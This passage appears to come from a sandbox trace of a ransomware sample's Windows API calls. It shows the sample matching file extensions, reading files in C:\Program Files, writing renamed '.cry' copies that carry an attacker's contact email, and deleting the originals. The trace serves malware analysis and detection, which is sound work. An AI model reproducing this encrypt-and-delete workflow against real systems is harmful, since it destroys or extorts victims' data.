returned 4 [0049.019] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString=".bz2") returned 4 [0049.019] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.019] lstrlenW (lpString=".7z") returned 3 [0049.019] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.020] lstrlenW (lpString=".dbf") returned 4 [0049.020] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.020] lstrlenW (lpString=".1cd") returned 4 [0049.020] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.020] lstrlenW (lpString=".jpg") returned 4 [0049.020] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.020] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0049.020] lstrlenW (lpString="VBLR6.CHM") returned 9 [0049.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.020] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=944994) returned 1 [0049.020] CloseHandle (hObject=0x1bc) returned 1 [0049.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 0x20 [0049.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.020] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.021] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.021] GetLastError () returned 0x0 [0049.021] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xe6b62, lpOverlapped=0x0) returned 1 [0049.186] WriteFile (in: hFile=0x20c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6b70, lpOverlapped=0x0) returned 1 [0049.510] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.510] WriteFile (in: hFile=0x20c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.510] SetEndOfFile (hFile=0x20c) returned 1 [0049.510] CloseHandle (hObject=0x20c) returned 1 [0049.510] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.510] SetEndOfFile (hFile=0x1bc) returned 1 [0049.517] CloseHandle (hObject=0x1bc) returned 1 [0049.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.517] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1 [0049.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.517] lstrlenW (lpString=".doc") returned 4 [0049.517] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString=".docx") returned 5 [0049.517] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.517] lstrlenW (lpString=".pdf") returned 4 [0049.517] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString=".xls") returned 4 [0049.517] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString=".xlsx") returned 5 [0049.517] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.517] lstrlenW (lpString=".ppt") returned 4 [0049.517] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.517] lstrlenW (lpString=".zip") returned 4 [0049.517] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString=".rar") returned 4 [0049.517] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.517] lstrlenW (lpString=".bz2") returned 4 [0049.518] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.518] lstrlenW (lpString=".7z") returned 3 [0049.518] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".dbf") returned 4 [0049.518] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".1cd") returned 4 [0049.518] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".jpg") returned 4 [0049.518] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".doc") returned 4 [0049.518] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString=".docx") returned 5 [0049.518] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.518] lstrlenW (lpString=".pdf") returned 4 [0049.518] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString=".xls") returned 4 [0049.518] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString=".xlsx") returned 5 [0049.518] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.518] lstrlenW (lpString=".ppt") returned 4 [0049.518] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".zip") returned 4 [0049.518] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString=".rar") returned 4 [0049.518] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString=".bz2") returned 4 [0049.518] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.518] lstrlenW (lpString=".7z") returned 3 [0049.518] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.518] lstrlenW (lpString=".dbf") returned 4 [0049.518] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.519] lstrlenW (lpString=".1cd") returned 4 [0049.519] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.519] lstrlenW (lpString=".jpg") returned 4 [0049.519] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.519] lstrcmpiW (lpString1=".inc", lpString2=".cry") returned 1 [0049.519] lstrlenW (lpString="adcjavas.inc") returned 12 [0049.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.554] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=630) returned 1 [0049.554] CloseHandle (hObject=0x190) returned 1 [0049.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0049.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.554] lstrlenW (lpString=".doc") returned 4 [0049.554] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.555] lstrlenW (lpString=".docx") returned 5 [0049.555] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.555] lstrlenW (lpString=".pdf") returned 4 [0049.555] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString=".xls") returned 4 [0049.555] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString=".xlsx") returned 5 [0049.555] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.555] lstrlenW (lpString=".ppt") returned 4 [0049.555] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.555] lstrlenW (lpString=".zip") returned 4 [0049.555] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString=".rar") returned 4 [0049.555] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString=".bz2") returned 4 [0049.555] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.555] lstrlenW (lpString=".7z") returned 3 [0049.555] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.555] lstrlenW (lpString=".dbf") returned 4 [0049.555] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.555] lstrlenW (lpString=".1cd") returned 4 [0049.555] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.555] lstrlenW (lpString=".jpg") returned 4 [0049.555] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.559] lstrlenW (lpString=".doc") returned 4 [0049.559] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.559] lstrlenW (lpString=".docx") returned 5 [0049.559] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.559] lstrlenW (lpString=".pdf") returned 4 [0049.559] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.559] lstrlenW (lpString=".xls") returned 4 [0049.559] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.559] lstrlenW (lpString=".xlsx") returned 5 [0049.559] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.560] lstrlenW (lpString=".ppt") returned 4 [0049.560] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.560] lstrlenW (lpString=".zip") returned 4 [0049.560] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.560] lstrlenW (lpString=".rar") returned 4 [0049.560] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.560] lstrlenW (lpString=".bz2") returned 4 [0049.560] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.560] lstrlenW (lpString=".7z") returned 3 [0049.560] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.560] lstrlenW (lpString=".dbf") returned 4 [0049.560] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.560] lstrlenW (lpString=".1cd") returned 4 [0049.560] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0049.560] lstrlenW (lpString=".jpg") returned 4 [0049.560] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.560] lstrcmpiW (lpString1=".ini", lpString2=".cry") returned 1 [0049.560] lstrlenW (lpString="desktop.ini") returned 11 [0049.560] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.560] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=174) returned 1 [0049.560] CloseHandle (hObject=0x190) returned 1 [0049.560] GetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 0x26 [0049.561] GetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.561] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.561] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.561] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.561] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0049.561] GetLastError () returned 0x0 [0049.561] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xae, lpOverlapped=0x0) returned 1 [0049.562] WriteFile (in: hFile=0x1c4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xb0, lpOverlapped=0x0) returned 1 [0049.562] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.562] WriteFile (in: hFile=0x1c4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.563] SetEndOfFile (hFile=0x1c4) returned 1 [0049.563] CloseHandle (hObject=0x1c4) returned 1 [0049.563] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.563] SetEndOfFile (hFile=0x190) returned 1 [0049.563] CloseHandle (hObject=0x190) returned 1 [0049.564] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x26) returned 1 [0049.564] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".doc") returned 4 [0049.567] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.567] lstrlenW (lpString=".docx") returned 5 [0049.567] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0049.567] lstrlenW (lpString=".pdf") returned 4 [0049.567] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString=".xls") returned 4 [0049.567] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString=".xlsx") returned 5 [0049.567] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0049.567] lstrlenW (lpString=".ppt") returned 4 [0049.567] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".zip") returned 4 [0049.567] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString=".rar") returned 4 [0049.567] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString=".bz2") returned 4 [0049.567] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0049.567] lstrlenW (lpString=".7z") returned 3 [0049.567] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".dbf") returned 4 [0049.567] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".1cd") returned 4 [0049.567] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".jpg") returned 4 [0049.567] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.567] lstrlenW (lpString=".doc") returned 4 [0049.567] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.568] lstrlenW (lpString=".docx") returned 5 [0049.568] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0049.568] lstrlenW (lpString=".pdf") returned 4 [0049.568] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString=".xls") returned 4 [0049.568] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString=".xlsx") returned 5 [0049.568] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0049.568] lstrlenW (lpString=".ppt") returned 4 [0049.568] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.568] lstrlenW (lpString=".zip") returned 4 [0049.568] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString=".rar") returned 4 [0049.568] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString=".bz2") returned 4 [0049.568] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0049.568] lstrlenW (lpString=".7z") returned 3 [0049.568] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0049.568] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.568] lstrlenW (lpString=".dbf") returned 4 [0049.568] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0049.568] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.568] lstrlenW (lpString=".1cd") returned 4 [0049.568] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0049.568] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.568] lstrlenW (lpString=".jpg") returned 4 [0049.568] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.568] lstrcmpiW (lpString1=".png", lpString2=".cry") returned 1 [0049.568] lstrlenW (lpString="DissolveAnother.png") returned 19 [0049.568] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.627] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=27935) returned 1 [0049.627] CloseHandle (hObject=0x190) returned 1 [0049.627] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png")) returned 0x20 [0049.628] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.628] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString=".doc") returned 4 [0049.628] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.628] lstrlenW (lpString=".docx") returned 5 [0049.628] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1 [0049.628] lstrlenW (lpString=".pdf") returned 4 [0049.628] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.628] lstrlenW (lpString=".xls") returned 4 [0049.628] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.628] lstrlenW (lpString=".xlsx") returned 5 [0049.628] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1 [0049.628] lstrlenW (lpString=".ppt") returned 4 [0049.628] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString=".zip") returned 4 [0049.628] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.628] lstrlenW (lpString=".rar") returned 4 [0049.628] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.628] lstrlenW (lpString=".bz2") returned 4 [0049.628] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.628] lstrlenW (lpString=".7z") returned 3 [0049.628] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString=".dbf") returned 4 [0049.628] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString=".1cd") returned 4 [0049.628] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.628] lstrlenW (lpString=".jpg") returned 4 [0049.629] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 